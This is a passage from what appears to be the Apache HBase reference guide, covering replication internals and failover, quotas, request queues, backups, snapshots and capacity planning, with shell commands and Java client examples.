When nodes are removed from the slave cluster, or if nodes go down or come back up, the master cluster's region servers will respond by selecting a new pool of slave region servers to replicate to.

==== Keeping Track of Logs

Each master cluster region server has its own znode in the replication znodes hierarchy.
It contains one znode per peer cluster (if 5 slave clusters, 5 znodes are created), and each of these contains a queue of WALs to process.
Each of these queues will track the WALs created by that region server, but they can differ in size.
For example, if one slave cluster becomes unavailable for some time, the WALs should not be deleted, so they need to stay in the queue while the others are processed.
See <<rs.failover.details,rs.failover.details>> for an example.

When a source is instantiated, it contains the current WAL that the region server is writing to.
During log rolling, the new file is added to the queue of each slave cluster's znode just before it is made available.
This ensures that all the sources are aware that a new log exists before the region server is able to append edits into it, but this operation is now more expensive.
The queue items are discarded when the replication thread cannot read more entries from a file (because it reached the end of the last block) and there are other files in the queue.
This means that if a source is up to date and replicates from the log that the region server writes to, reading up to the "end" of the current file will not delete the item in the queue.

A log can be archived if it is no longer used or if the number of logs exceeds `hbase.regionserver.maxlogs` because the insertion rate is faster than regions are flushed.
When a log is archived, the source threads are notified that the path for that log changed.
If a particular source has already finished with an archived log, it will just ignore the message.
If the log is in the queue, the path will be updated in memory.
If the log is currently being replicated, the change will be done atomically so that the reader doesn't attempt to open the file when it has already been moved.
Because moving a file is a NameNode operation, if the reader is currently reading the log, it won't generate any exception.

==== Reading, Filtering and Sending Edits

By default, a source attempts to read from a WAL and ship log entries to a sink as quickly as possible.
Speed is limited by the filtering of log entries: only KeyValues that are scoped GLOBAL and that do not belong to catalog tables will be retained.
Speed is also limited by total size of the list of edits to replicate per slave, which is limited to 64 MB by default.
With this configuration, a master cluster region server with three slaves would use at most 192 MB to store data to replicate.
This does not account for the data which was filtered but not garbage collected.

Once the maximum size of edits has been buffered or the reader reaches the end of the WAL, the source thread stops reading and chooses at random a sink to replicate to (from the list that was generated by keeping only a subset of slave region servers). It directly issues an RPC to the chosen region server and waits for the method to return.
If the RPC was successful, the source determines whether the current file has been emptied or it contains more data which needs to be read.
If the file has been emptied, the source deletes the znode in the queue.
Otherwise, it registers the new offset in the log's znode.
If the RPC threw an exception, the source will retry 10 times before trying to find a different sink.

==== Cleaning Logs

If replication is not enabled, the master's log-cleaning thread deletes old logs using a configured TTL.
This TTL-based method does not work well with replication, because archived logs which have exceeded their TTL may still be in a queue.
The default behavior is augmented so that if a log is past its TTL, the cleaning thread looks up every queue until it finds the log, while caching queues it has found.
If the log is not found in any queues, the log will be deleted.
The next time the cleaning process needs to look for a log, it starts by using its cached list.

NOTE: WALs are saved when replication is enabled or disabled as long as peers exist.

[[rs.failover.details]]
==== Region Server Failover

When no region servers are failing, keeping track of the logs in ZooKeeper adds no value.
Unfortunately, region servers do fail, and since ZooKeeper is highly available, it is useful for managing the transfer of the queues in the event of a failure.

Each of the master cluster region servers keeps a watcher on every other region server, in order to be notified when one dies (just as the master does).
When a failure happens, they all race to create a znode called `lock` inside the dead region server's znode that contains its queues.
The region server that creates it successfully then transfers all the queues to its own znode, one at a time since ZooKeeper does not support renaming queues.
After queues are all transferred, they are deleted from the old location.
The znodes that were recovered are renamed with the ID of the slave cluster appended with the name of the dead server.

Next, the master cluster region server creates one new source thread per copied queue, and each of the source threads follows the read/filter/ship pattern.
The main difference is that those queues will never receive new data, since they do not belong to their new region server.
When the reader hits the end of the last log, the queue's znode is deleted and the master cluster region server closes that replication source.

Given a master cluster with 3 region servers replicating to a single slave with id `2`, the following hierarchy represents what the znodes layout could be at some point in time.
The region servers' znodes all contain a `peers` znode which contains a single queue.
The znode names in the queues represent the actual file names on HDFS in the form `address,port.timestamp`.

----
/hbase/replication/rs/
  1.1.1.1,60020,123456780/
    2/
      1.1.1.1,60020.1234 (Contains a position)
      1.1.1.1,60020.1265
  1.1.1.2,60020,123456790/
    2/
      1.1.1.2,60020.1214 (Contains a position)
      1.1.1.2,60020.1248
      1.1.1.2,60020.1312
  1.1.1.3,60020,123456630/
    2/
      1.1.1.3,60020.1280 (Contains a position)
----

Assume that 1.1.1.2 loses its ZooKeeper session.
The survivors will race to create a lock, and, arbitrarily, 1.1.1.3 wins.
It will then start transferring all the queues to its local peers znode by appending the name of the dead server.
Right before 1.1.1.3 is able to clean up the old znodes, the layout will look like the following:

----
/hbase/replication/rs/
  1.1.1.1,60020,123456780/
    2/
      1.1.1.1,60020.1234 (Contains a position)
      1.1.1.1,60020.1265
  1.1.1.2,60020,123456790/
    lock
    2/
      1.1.1.2,60020.1214 (Contains a position)
      1.1.1.2,60020.1248
      1.1.1.2,60020.1312
  1.1.1.3,60020,123456630/
    2/
      1.1.1.3,60020.1280 (Contains a position)
    2-1.1.1.2,60020,123456790/
      1.1.1.2,60020.1214 (Contains a position)
      1.1.1.2,60020.1248
      1.1.1.2,60020.1312
----

Some time later, but before 1.1.1.3 is able to finish replicating the last WAL from 1.1.1.2, it dies too.
Some new logs were also created in the normal queues.
The last region server will then try to lock 1.1.1.3's znode and will begin transferring all the queues.
The new layout will be:

----
/hbase/replication/rs/
  1.1.1.1,60020,123456780/
    2/
      1.1.1.1,60020.1378 (Contains a position)
    2-1.1.1.3,60020,123456630/
      1.1.1.3,60020.1325 (Contains a position)
      1.1.1.3,60020.1401
    2-1.1.1.2,60020,123456790-1.1.1.3,60020,123456630/
      1.1.1.2,60020.1312 (Contains a position)
  1.1.1.3,60020,123456630/
    lock
    2/
      1.1.1.3,60020.1325 (Contains a position)
      1.1.1.3,60020.1401
    2-1.1.1.2,60020,123456790/
      1.1.1.2,60020.1312 (Contains a position)
----

=== Replication Metrics

The following metrics are exposed at the global region server level and (since HBase 0.95) at the peer level:

`source.sizeOfLogQueue`::
 number of WALs to process (excludes the one which is being processed) at the Replication source

`source.shippedOps`::
 number of mutations shipped
shipped\n\n`source.logEditsRead`::\n number of mutations read from WALs at the replication source\n\n`source.ageOfLastShippedOp`::\n age of the last batch that was shipped by the replication source\n\n=== Replication Configuration Options\n\n[cols=\"1,1,1\", options=\"header\"]\n|===\n| Option\n| Description\n| Default\n\n| zookeeper.znode.parent\n| The name of the base ZooKeeper znode used for HBase\n| \/hbase\n\n| zookeeper.znode.replication\n| The name of the base znode used for replication\n| replication\n\n| zookeeper.znode.replication.peers\n| The name of the peer znode\n| peers\n\n| zookeeper.znode.replication.peers.state\n| The name of the peer-state znode\n| peer-state\n\n| zookeeper.znode.replication.rs\n| The name of the rs znode\n| rs\n\n| replication.sleep.before.failover\n| How many milliseconds a worker should sleep before attempting to replicate\n a dead region server's WAL queues.\n|\n\n| replication.executor.workers\n| The number of region servers a given region server should attempt to\n failover simultaneously.\n| 1\n|===\n\n=== Monitoring Replication Status\n\nYou can use the HBase Shell command `status 'replication'` to monitor the replication status on your cluster. The command has three variations:\n\n* `status 'replication'` -- prints the status of each source and its sinks, sorted by hostname.\n* `status 'replication', 'source'` -- prints the status for each replication source, sorted by hostname.\n* `status 'replication', 'sink'` -- prints the status for each replication sink, sorted by hostname.\n\n== Running Multiple Workloads On a Single Cluster\n\nHBase provides the following mechanisms for managing the performance of a cluster\nhandling multiple workloads:\n\n. <<quota>>\n. <<request_queues>>\n. <<multiple-typed-queues>>\n\n[[quota]]\n=== Quotas\nHBASE-11598 introduces quotas, which allow you to throttle requests based on\nthe following limits:\n\n. <<request-quotas,The number or size of requests (read, write, or read+write) in a given timeframe>>\n. <<namespace_quotas,The number of tables allowed in a namespace>>\n\nThese limits can be enforced for a specified user, table, or namespace.\n\n.Enabling Quotas\n\nQuotas are disabled by default. To enable the feature, set the `hbase.quota.enabled`\nproperty to `true` in the _hbase-site.xml_ file for all cluster nodes.\n\n.General Quota Syntax\n. THROTTLE_TYPE can be expressed as READ, WRITE, or the default type (read + write).\n. Timeframes can be expressed in the following units: `sec`, `min`, `hour`, `day`\n. Request sizes can be expressed in the following units: `B` (bytes), `K` (kilobytes),\n`M` (megabytes), `G` (gigabytes), `T` (terabytes), `P` (petabytes)\n. Numbers of requests are expressed as an integer followed by the string `req`\n. Limits relating to time are expressed as req\/time or size\/time. For instance `10req\/day`\nor `100P\/hour`.\n. Numbers of tables or regions are expressed as integers.\n\n[[request-quotas]]\n.Setting Request Quotas\nYou can set quota rules ahead of time, or you can change the throttle at runtime. The change\nwill propagate after the quota refresh period has expired. This expiration period\ndefaults to 5 minutes. To change it, modify the `hbase.quota.refresh.period` property\nin `hbase-site.xml`.
This property is expressed in milliseconds and defaults to `300000`.\n\n----\n# Limit user u1 to 10 requests per second\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => '10req\/sec'\n\n# Limit user u1 to 10 read requests per second\nhbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => READ, USER => 'u1', LIMIT => '10req\/sec'\n\n# Limit user u1 to 10 M per day everywhere\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => '10M\/day'\n\n# Limit user u1 to 10 M write size per sec\nhbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => WRITE, USER => 'u1', LIMIT => '10M\/sec'\n\n# Limit user u1 to 5k per minute on table t2\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', TABLE => 't2', LIMIT => '5K\/min'\n\n# Limit user u1 to 10 read requests per sec on table t2\nhbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => READ, USER => 'u1', TABLE => 't2', LIMIT => '10req\/sec'\n\n# Remove an existing limit from user u1 on namespace ns2\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', NAMESPACE => 'ns2', LIMIT => NONE\n\n# Limit all users to 10 requests per hour on namespace ns1\nhbase> set_quota TYPE => THROTTLE, NAMESPACE => 'ns1', LIMIT => '10req\/hour'\n\n# Limit all users to 10 T per hour on table t1\nhbase> set_quota TYPE => THROTTLE, TABLE => 't1', LIMIT => '10T\/hour'\n\n# Remove all existing limits from user u1\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => NONE\n\n# List all quotas for user u1 in namespace ns2\nhbase> list_quotas USER => 'u1', NAMESPACE => 'ns2'\n\n# List all quotas for namespace ns2\nhbase> list_quotas NAMESPACE => 'ns2'\n\n# List all quotas for table t1\nhbase> list_quotas TABLE => 't1'\n\n# List all quotas\nhbase> list_quotas\n----\n\nYou can also place a global limit and exclude a user or a table from the limit by applying the\n`GLOBAL_BYPASS` property.\n----\nhbase> set_quota NAMESPACE => 'ns1', LIMIT => '100req\/min' # a per-namespace request limit\nhbase> set_quota USER => 'u1', GLOBAL_BYPASS => true # user u1 is not affected by the limit\n----\n\n[[namespace_quotas]]\n.Setting Namespace Quotas\n\nYou can specify the maximum number of tables or regions allowed in a given namespace, either\nwhen you create the namespace or by altering an existing namespace, by setting the\n`hbase.namespace.quota.maxtables` property (for tables) or the `hbase.namespace.quota.maxregions` property (for regions) on the namespace.\n\n.Limiting Tables Per Namespace\n----\n# Create a namespace with a max of 5 tables\nhbase> create_namespace 'ns1', {'hbase.namespace.quota.maxtables'=>'5'}\n\n# Alter an existing namespace to have a max of 8 tables\nhbase> alter_namespace 'ns2', {METHOD => 'set', 'hbase.namespace.quota.maxtables'=>'8'}\n\n# Show quota information for a namespace\nhbase> describe_namespace 'ns2'\n\n# Alter an existing namespace to remove a quota\nhbase> alter_namespace 'ns2', {METHOD => 'unset', NAME=>'hbase.namespace.quota.maxtables'}\n----\n\n.Limiting Regions Per Namespace\n----\n# Create a namespace with a max of 10 regions\nhbase> create_namespace 'ns1', {'hbase.namespace.quota.maxregions'=>'10'}\n\n# Show quota information for a namespace\nhbase> describe_namespace 'ns1'\n\n# Alter an existing namespace to have a max of 20 regions\nhbase> alter_namespace 'ns2', {METHOD => 'set', 'hbase.namespace.quota.maxregions'=>'20'}\n\n# Alter an existing namespace to remove a quota\nhbase> alter_namespace 'ns2', {METHOD => 'unset', NAME=> 'hbase.namespace.quota.maxregions'}\n----
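\nThe same throttles can also be managed programmatically. The following is a minimal sketch using the client quota API available in HBase 1.1+ (`QuotaSettingsFactory` and `Admin.setQuota`); the user name and limit mirror the shell examples above.\n\n[source,java]\n----\nimport java.util.concurrent.TimeUnit;\n\nimport org.apache.hadoop.conf.Configuration;\nimport org.apache.hadoop.hbase.HBaseConfiguration;\nimport org.apache.hadoop.hbase.client.Admin;\nimport org.apache.hadoop.hbase.client.Connection;\nimport org.apache.hadoop.hbase.client.ConnectionFactory;\nimport org.apache.hadoop.hbase.quotas.QuotaSettings;\nimport org.apache.hadoop.hbase.quotas.QuotaSettingsFactory;\nimport org.apache.hadoop.hbase.quotas.ThrottleType;\n\npublic class QuotaExample {\n  public static void main(String[] args) throws Exception {\n    Configuration conf = HBaseConfiguration.create();\n    try (Connection connection = ConnectionFactory.createConnection(conf);\n         Admin admin = connection.getAdmin()) {\n      \/\/ Throttle user u1 to 10 requests per second, as in the shell example above.\n      QuotaSettings throttle =\n          QuotaSettingsFactory.throttleUser(\"u1\", ThrottleType.REQUEST_NUMBER, 10, TimeUnit.SECONDS);\n      admin.setQuota(throttle);\n\n      \/\/ Remove the throttle again.\n      admin.setQuota(QuotaSettingsFactory.unthrottleUser(\"u1\"));\n    }\n  }\n}\n----\n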
[[request_queues]]\n=== Request Queues\n\nIf no throttling policy is configured, when the RegionServer receives multiple requests,\nthey are now placed into a queue waiting for a free execution slot (HBASE-6721).\nThe simplest queue is a FIFO queue, where each request waits for all previous requests in the queue\nto finish before running. Fast or interactive queries can get stuck behind large requests.\n\nIf you are able to guess how long a request will take, you can reorder requests by\npushing the long requests to the end of the queue and allowing short requests to preempt\nthem. Eventually, you must still execute the large requests and prioritize the new\nrequests behind them. The short requests will be newer, so the result is not terrible,\nbut still suboptimal compared to a mechanism which allows large requests to be split\ninto multiple smaller ones.\n\nHBASE-10993 introduces such a system for deprioritizing long-running scanners. There\nare two types of queues, `fifo` and `deadline`. To configure the type of queue used,\nconfigure the `hbase.ipc.server.callqueue.type` property in `hbase-site.xml`. There\nis no way to estimate how long each request may take, so de-prioritization only affects\nscans, and is based on the number of `next` calls a scan request has made. An assumption\nis made that when you are doing a full table scan, your job is not likely to be interactive,\nso if there are concurrent requests, you can delay long-running scans up to a limit tunable by\nsetting the `hbase.ipc.server.queue.max.call.delay` property. The slope of the delay is calculated\nas a simple square root of `(numNextCall * weight)`, where the weight is\nconfigurable by setting the `hbase.ipc.server.scan.vtime.weight` property. A sketch of this delay\ncurve is shown after <<multiple-typed-queues>> below.\n\n[[multiple-typed-queues]]\n=== Multiple-Typed Queues\n\nYou can also prioritize or deprioritize different kinds of requests by configuring\na specified number of dedicated handlers and queues. You can segregate the scan requests\ninto a single queue with a single handler, and all the other available queues can service\nshort `Get` requests.\n\nYou can adjust the IPC queues and handlers based on the type of workload, using static\ntuning options. This approach is an interim first step that will eventually allow\nyou to change the settings at runtime, and to dynamically adjust values based on the load.\n\n.Multiple Queues\n\nTo avoid contention and separate different kinds of requests, configure the\n`hbase.ipc.server.callqueue.handler.factor` property, which allows you to increase the number of\nqueues and control how many handlers can share the same queue.\n\nUsing more queues reduces contention when adding a task to a queue or selecting it\nfrom a queue. You can even configure one queue per handler. The trade-off is that\nif some queues contain long-running tasks, a handler may need to wait to execute from that queue\nrather than stealing from another queue which has waiting tasks.\n\n.Read and Write Queues\nWith multiple queues, you can now divide read and write requests, giving more priority\n(more queues) to one or the other type. Use the `hbase.ipc.server.callqueue.read.ratio`\nproperty to choose to serve more reads or more writes.\n\n.Get and Scan Queues\nSimilar to the read\/write split, you can split gets and scans by tuning the `hbase.ipc.server.callqueue.scan.ratio`\nproperty to give more priority to gets or to scans. A scan ratio of `0.1` will give\nmore queue\/handlers to the incoming gets, which means that more gets can be processed\nat the same time and that fewer scans can be executed at the same time. A value of\n`0.9` will give more queue\/handlers to scans, so the number of scans executed will\nincrease and the number of gets will decrease.
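\nTo make the deadline behavior described above concrete, here is a minimal, illustrative Java sketch of the delay curve. This is not the HBase implementation; the property names in the comments are real, but the method itself is an assumption for illustration only.\n\n[source,java]\n----\npublic final class ScanDelaySketch {\n\n  \/\/ Illustrative: the delay grows with the square root of (numNextCall * weight),\n  \/\/ capped by the value of hbase.ipc.server.queue.max.call.delay.\n  static long scanDelayMillis(long numNextCall, double weight, long maxCallDelayMillis) {\n    long delay = (long) Math.sqrt(numNextCall * weight);\n    return Math.min(delay, maxCallDelayMillis);\n  }\n\n  public static void main(String[] args) {\n    \/\/ A scan that has issued 10,000 next calls with weight 1.0 is delayed ~100 ms.\n    System.out.println(scanDelayMillis(10000, 1.0, 5000));\n  }\n}\n----\n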
[[ops.backup]]\n== HBase Backup\n\nThere are two broad strategies for performing HBase backups: backing up with a full cluster shutdown, and backing up on a live cluster.\nEach approach has pros and cons.\n\nFor additional information, see link:http:\/\/blog.sematext.com\/2011\/03\/11\/hbase-backup-options\/[HBase Backup\n Options] over on the Sematext Blog.\n\n[[ops.backup.fullshutdown]]\n=== Full Shutdown Backup\n\nSome environments can tolerate a periodic full shutdown of their HBase cluster, for example if it is being used as a back-end analytic capacity and not serving front-end web-pages.\nThe benefit is that since the NameNode\/Master and RegionServers are down, there is no chance of missing any in-flight changes to either StoreFiles or metadata.\nThe obvious con is that the cluster is down.\nThe steps include:\n\n[[ops.backup.fullshutdown.stop]]\n==== Stop HBase\n\n\n\n[[ops.backup.fullshutdown.distcp]]\n==== Distcp\n\nDistcp can be used to copy the contents of the HBase directory in HDFS either to the same cluster in another directory, or to a different cluster.\n\nNOTE: Distcp works in this situation because the cluster is down and there are no in-flight edits to files.\nDistcp-ing of files in the HBase directory is not generally recommended on a live cluster.\n\n[[ops.backup.fullshutdown.restore]]\n==== Restore (if needed)\n\nThe backup of the hbase directory from HDFS is copied onto the 'real' hbase directory via distcp.\nThe act of copying these files creates new HDFS metadata, which is why a restore of the NameNode edits from the time of the HBase backup isn't required for this kind of restore, because it's a restore (via distcp) of a specific HDFS directory (i.e., the HBase part), not the entire HDFS file-system.\n\n[[ops.backup.live.replication]]\n=== Live Cluster Backup - Replication\n\nThis approach assumes that there is a second cluster.\nSee the HBase page on link:http:\/\/hbase.apache.org\/book.html#replication[replication] for more information.\n\n[[ops.backup.live.copytable]]\n=== Live Cluster Backup - CopyTable\n\nThe <<copy.table,copytable>> utility can be used either to copy data from one table to another on the same cluster, or to copy data to another table on another cluster.\n\nSince the cluster is up, there is a risk that edits could be missed in the copy process.\n\n[[ops.backup.live.export]]\n=== Live Cluster Backup - Export\n\nThe <<export,export>> approach dumps the content of a table to HDFS on the same cluster.\nTo restore the data, the <<import,import>> utility would be used.\n\nSince the cluster is up, there is a risk that edits could be missed in the export process.\n\n[[ops.snapshots]]\n== HBase Snapshots\n\nHBase Snapshots allow you to take a snapshot of a table without too much impact on Region Servers.\nSnapshot, clone, and restore operations don't involve data copying.\nAlso, exporting a snapshot to another cluster has no impact on the Region Servers.\n\nPrior to version 0.94.6, the only way to back up or clone a table was to use CopyTable\/ExportTable, or to copy all the hfiles in HDFS after disabling the table.\nThe disadvantages of these methods are that you can degrade region server performance (Copy\/Export Table), or that you need to disable the table, which means no reads or writes; this is usually unacceptable.
[[ops.snapshots.configuration]]\n=== Configuration\n\nTo turn on snapshot support, just set the `hbase.snapshot.enabled` property to `true`.\n(Snapshots are enabled by default in 0.95+ and off by default in 0.94.6+)\n\n[source,xml]\n----\n\n  <property>\n    <name>hbase.snapshot.enabled<\/name>\n    <value>true<\/value>\n  <\/property>\n----\n\n[[ops.snapshots.takeasnapshot]]\n=== Take a Snapshot\n\nYou can take a snapshot of a table regardless of whether it is enabled or disabled.\nThe snapshot operation doesn't involve any data copying.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> snapshot 'myTable', 'myTableSnapshot-122112'\n----\n\n.Take a Snapshot Without Flushing\nThe default behavior is to perform a flush of data in memory before the snapshot is taken.\nThis means that data in memory is included in the snapshot.\nIn most cases, this is the desired behavior.\nHowever, if your set-up can tolerate data in memory being excluded from the snapshot, you can use the `SKIP_FLUSH` option of the `snapshot` command to disable flushing while taking the snapshot.\n\n----\nhbase> snapshot 'mytable', 'snapshot123', {SKIP_FLUSH => true}\n----\n\nWARNING: There is no way to determine or predict whether a concurrent insert or update will be included in a given snapshot, whether flushing is enabled or disabled.\nA snapshot is only a representation of a table during a window of time.\nThe amount of time the snapshot operation will take to reach each Region Server may vary from a few seconds to a minute, depending on the resource load and speed of the hardware or network, among other factors.\nThere is also no way to know whether a given insert or update is in memory or has been flushed.\n\n[[ops.snapshots.list]]\n=== Listing Snapshots\n\nList all snapshots taken (by printing the names and relative information).\n\n----\n\n$ .\/bin\/hbase shell\nhbase> list_snapshots\n----\n\n[[ops.snapshots.delete]]\n=== Deleting Snapshots\n\nYou can remove a snapshot, and the files retained for that snapshot will be removed if they are no longer needed.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> delete_snapshot 'myTableSnapshot-122112'\n----\n\n[[ops.snapshots.clone]]\n=== Clone a table from snapshot\n\nFrom a snapshot you can create a new table (clone operation) with the same data that you had when the snapshot was taken.\nThe clone operation doesn't involve data copies, and a change to the cloned table doesn't impact the snapshot or the original table.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> clone_snapshot 'myTableSnapshot-122112', 'myNewTestTable'\n----\n\n[[ops.snapshots.restore]]\n=== Restore a snapshot\n\nThe restore operation requires the table to be disabled, and the table will be restored to the state at the time when the snapshot was taken, changing both data and schema if required.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> disable 'myTable'\nhbase> restore_snapshot 'myTableSnapshot-122112'\n----\n\nNOTE: Since replication works at the log level and snapshots at the file-system level, after a restore, the replicas will be in a different state from the master.\nIf you want to use restore, you need to stop replication and redo the bootstrap.\n\nIn case of partial data-loss due to a misbehaving client, instead of a full restore that requires the table to be disabled, you can clone the table from the snapshot and use a Map-Reduce job to copy the data that you need, from the clone to the main one.
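\nThe same snapshot operations are available programmatically through the `Admin` API. The following is a minimal sketch; the table and snapshot names are illustrative and match the shell examples above.\n\n[source,java]\n----\nimport org.apache.hadoop.hbase.HBaseConfiguration;\nimport org.apache.hadoop.hbase.TableName;\nimport org.apache.hadoop.hbase.client.Admin;\nimport org.apache.hadoop.hbase.client.Connection;\nimport org.apache.hadoop.hbase.client.ConnectionFactory;\n\npublic class SnapshotExample {\n  public static void main(String[] args) throws Exception {\n    TableName table = TableName.valueOf(\"myTable\");\n    try (Connection connection = ConnectionFactory.createConnection(HBaseConfiguration.create());\n         Admin admin = connection.getAdmin()) {\n      \/\/ Take a snapshot of the (enabled or disabled) table.\n      admin.snapshot(\"myTableSnapshot-122112\", table);\n\n      \/\/ Clone the snapshot into a new table; no data is copied.\n      admin.cloneSnapshot(\"myTableSnapshot-122112\", TableName.valueOf(\"myNewTestTable\"));\n\n      \/\/ Restoring requires the table to be disabled first.\n      admin.disableTable(table);\n      admin.restoreSnapshot(\"myTableSnapshot-122112\");\n      admin.enableTable(table);\n    }\n  }\n}\n----\n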
[[ops.snapshots.acls]]\n=== Snapshots operations and ACLs\n\nIf you are using security with the AccessController Coprocessor (see <<hbase.accesscontrol.configuration,hbase.accesscontrol.configuration>>), only a global administrator can take, clone, or restore a snapshot, and these actions do not capture the ACL rights.\nThis means that restoring a table preserves the ACL rights of the existing table, while cloning a table creates a new table that has no ACL rights until the administrator adds them.\n\n[[ops.snapshots.export]]\n=== Export to another cluster\n\nThe ExportSnapshot tool copies all the data related to a snapshot (hfiles, logs, snapshot metadata) to another cluster.\nThe tool executes a Map-Reduce job, similar to distcp, to copy files between the two clusters, and since it works at the file-system level the HBase cluster does not have to be online.\n\nTo copy a snapshot called MySnapshot to an HBase cluster srv2 (hdfs:\/\/srv2:8082\/hbase) using 16 mappers:\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot -snapshot MySnapshot -copy-to hdfs:\/\/srv2:8082\/hbase -mappers 16\n----\n\n.Limiting Bandwidth Consumption\nYou can limit the bandwidth consumption when exporting a snapshot, by specifying the `-bandwidth` parameter, which expects an integer representing megabytes per second.\nThe following example limits the above example to 200 MB\/sec.\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot -snapshot MySnapshot -copy-to hdfs:\/\/srv2:8082\/hbase -mappers 16 -bandwidth 200\n----\n\n[[snapshots_s3]]\n=== Storing Snapshots in an Amazon S3 Bucket\n\nFor general information and limitations of using Amazon S3 storage with HBase, see\n<<amazon_s3_configuration>>. You can also store and retrieve snapshots from Amazon\nS3, using the following procedure.\n\nNOTE: You can also store snapshots in Microsoft Azure Blob Storage. See <<snapshots_azure>>.\n\n.Prerequisites\n- You must be using HBase 1.0 or higher and Hadoop 2.6.1 or higher, which is the first\nconfiguration that uses the Amazon AWS SDK.\n- You must use the `s3a:\/\/` protocol to connect to Amazon S3.
The older `s3n:\/\/`\nand `s3:\/\/` protocols have various limitations and do not use the Amazon AWS SDK.\n- The `s3a:\/\/` URI must be configured and available on the server where you run\nthe commands to export and restore the snapshot.\n\nAfter you have fulfilled the prerequisites, take the snapshot like you normally would.\nAfterward, you can export it using the `org.apache.hadoop.hbase.snapshot.ExportSnapshot`\ncommand like the one below, substituting your own `s3a:\/\/` path in the `copy-from`\nor `copy-to` directive and substituting or modifying other options as required:\n\n----\n$ hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot \\\n    -snapshot MySnapshot \\\n    -copy-from hdfs:\/\/srv2:8082\/hbase \\\n    -copy-to s3a:\/\/<bucket>\/<namespace>\/hbase \\\n    -chuser MyUser \\\n    -chgroup MyGroup \\\n    -chmod 700 \\\n    -mappers 16\n----\n\n----\n$ hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot \\\n    -snapshot MySnapshot \\\n    -copy-from s3a:\/\/<bucket>\/<namespace>\/hbase \\\n    -copy-to hdfs:\/\/srv2:8082\/hbase \\\n    -chuser MyUser \\\n    -chgroup MyGroup \\\n    -chmod 700 \\\n    -mappers 16\n----\n\nYou can also use the `org.apache.hadoop.hbase.snapshot.SnapshotInfo` utility with the `s3a:\/\/` path by including the\n`-remote-dir` option.\n\n----\n$ hbase org.apache.hadoop.hbase.snapshot.SnapshotInfo \\\n    -remote-dir s3a:\/\/<bucket>\/<namespace>\/hbase \\\n    -list-snapshots\n----\n\n[[snapshots_azure]]\n=== Storing Snapshots in Microsoft Azure Blob Storage\n\nYou can store snapshots in Microsoft Azure Blob Storage using the same techniques\nas in <<snapshots_s3>>.\n\n.Prerequisites\n- You must be using HBase 1.2 or higher with Hadoop 2.7.1 or\n higher. No version of HBase supports Hadoop 2.7.0.\n- Your hosts must be configured to be aware of the Azure blob storage filesystem.\n See http:\/\/hadoop.apache.org\/docs\/r2.7.1\/hadoop-azure\/index.html.\n\nAfter you meet the prerequisites, follow the instructions\nin <<snapshots_s3>>, replacing the protocol specifier with `wasb:\/\/` or `wasbs:\/\/`.\n\n[[ops.capacity]]\n== Capacity Planning and Region Sizing\n\nThere are several considerations when planning the capacity for an HBase cluster and performing the initial configuration.\nStart with a solid understanding of how HBase handles data internally.\n\n[[ops.capacity.nodes]]\n=== Node count and hardware\/VM configuration\n\n[[ops.capacity.nodes.datasize]]\n==== Physical data size\n\nPhysical data size on disk is distinct from the logical size of your data and is affected by the following:\n\n* Increased by HBase overhead\n** See <<keyvalue,keyvalue>> and <<keysize,keysize>>.\n At least 24 bytes per key-value (cell), can be more.\n Small keys\/values means more relative overhead.\n** KeyValue instances are aggregated into blocks, which are indexed.\n Indexes also have to be stored.\n Blocksize is configurable on a per-ColumnFamily basis.\n See <<regions.arch,regions.arch>>.\n* Decreased by <<compression,compression>> and data block encoding, depending on data.\n See also link:http:\/\/search-hadoop.com\/m\/lL12B1PFVhp1[this thread].\n You might want to test what compression and encoding (if any) make sense for your data.\n* Increased by the size of the region server <<wal,wal>> (usually fixed and negligible - less than half of RS memory size, per RS).\n* Increased by HDFS replication - usually x3.\n\nAside from the disk space necessary to store the data, one RS may not be able to serve arbitrarily large amounts of data due to some practical limits on region count and size (see
<<ops.capacity.regions,ops.capacity.regions>>).\n\n[[ops.capacity.nodes.throughput]]\n==== Read\/Write throughput\n\nThe number of nodes can also be driven by the required throughput for reads and\/or writes.\nThe throughput one can get per node depends a lot on data (esp.\nkey\/value sizes) and request patterns, as well as node and system configuration.\nPlanning should be done for peak load if it is likely that the load would be the main driver of the increase of the node count.\nPerformanceEvaluation and <<ycsb,ycsb>> tools can be used to test a single node or a test cluster.\n\nFor writes, usually 5-15 MB\/s per RS can be expected, since every region server has only one active WAL.\nThere's no good estimate for reads, as it depends vastly on data, requests, and cache hit rate. <<perf.casestudy,perf.casestudy>> might be helpful.\n\n[[ops.capacity.nodes.gc]]\n==== JVM GC limitations\n\nA RS cannot currently utilize a very large heap due to the cost of GC.\nThere's also no good way of running multiple RS-es per server (other than running several VMs per machine). Thus, ~20-24 GB or less memory dedicated to one RS is recommended.\nGC tuning is required for large heap sizes.\nSee <<gcpause,gcpause>>, <<trouble.log.gc,trouble.log.gc>> and elsewhere.\n\n[[ops.capacity.regions]]\n=== Determining region count and size\n\nGenerally, fewer regions make for a smoother running cluster (you can always manually split the big regions later (if necessary) to spread the data, or request load, over the cluster); 20-200 regions per RS is a reasonable range.\nThe number of regions cannot be configured directly (unless you go for fully <<disable.splitting,disable.splitting>>); adjust the region size to achieve the target region count given the table size.\n\nWhen configuring regions for multiple tables, note that most region settings can be set on a per-table basis via link:http:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/HTableDescriptor.html[HTableDescriptor], as well as shell commands.\nThese settings will override the ones in `hbase-site.xml`.\nThat is useful if your tables have different workloads\/use cases.\n\nAlso note that in the discussion of region sizes here, _HDFS replication factor is not (and should not be) taken into account, whereas\n other factors <<ops.capacity.nodes.datasize,ops.capacity.nodes.datasize>> should be._ So, if your data is compressed and replicated 3 ways by HDFS, \"9 Gb region\" means 9 Gb of compressed 